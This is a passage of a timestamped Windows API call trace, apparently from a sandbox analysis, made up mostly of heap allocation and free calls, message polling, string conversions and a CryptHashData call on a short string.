dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0227.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0227.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0227.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0227.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0227.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0227.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0227.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0227.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0227.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0227.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0227.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0227.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0227.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0227.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0227.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0227.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0227.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0227.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0227.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0227.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0227.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0227.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0227.321] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0227.321] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0227.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0227.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0227.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0227.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0227.321] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0227.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0227.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0227.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0227.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0227.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0227.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0227.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0227.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0227.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0227.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55048 [0227.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0227.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0227.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0227.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0227.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55058, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0227.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0227.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0227.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0227.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0227.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0227.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0227.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0227.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0227.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0227.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0227.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0227.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0227.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0227.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0227.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0227.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0227.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0227.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0227.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0227.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0227.323] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0227.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0227.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0227.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0227.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0227.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0227.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0227.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0227.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0227.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0227.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550c8 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0227.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0227.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0227.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0227.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0227.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0227.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0227.325] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0227.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0227.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0227.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0227.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0227.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0227.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0227.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0227.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0227.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0227.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0227.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55078 [0227.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0227.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0227.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0227.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0227.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55068, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0227.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0227.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0227.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0227.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0227.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f88 [0227.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0227.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0227.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0227.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0227.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0227.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0227.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0227.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0227.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0227.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.326] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0227.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0227.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0227.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0227.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0227.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0227.326] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0227.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0227.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0227.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0227.327] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0227.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0227.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0227.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0227.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0227.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0227.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0227.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0227.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0227.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0227.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0227.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0227.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0227.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0227.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0227.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0227.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0227.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0227.328] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0227.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0227.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51478, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0227.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0227.328] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0227.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0227.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0227.328] CryptHashData (hHash=0xa87090, pbData=0x2e550c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0227.328] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.328] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0227.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.329] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0227.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0227.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51358 [0227.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0227.329] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0227.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0227.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0227.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0227.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0227.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0227.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0227.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0227.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0227.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0227.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0227.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0227.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0227.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0227.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0227.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0227.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0227.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0227.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0227.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 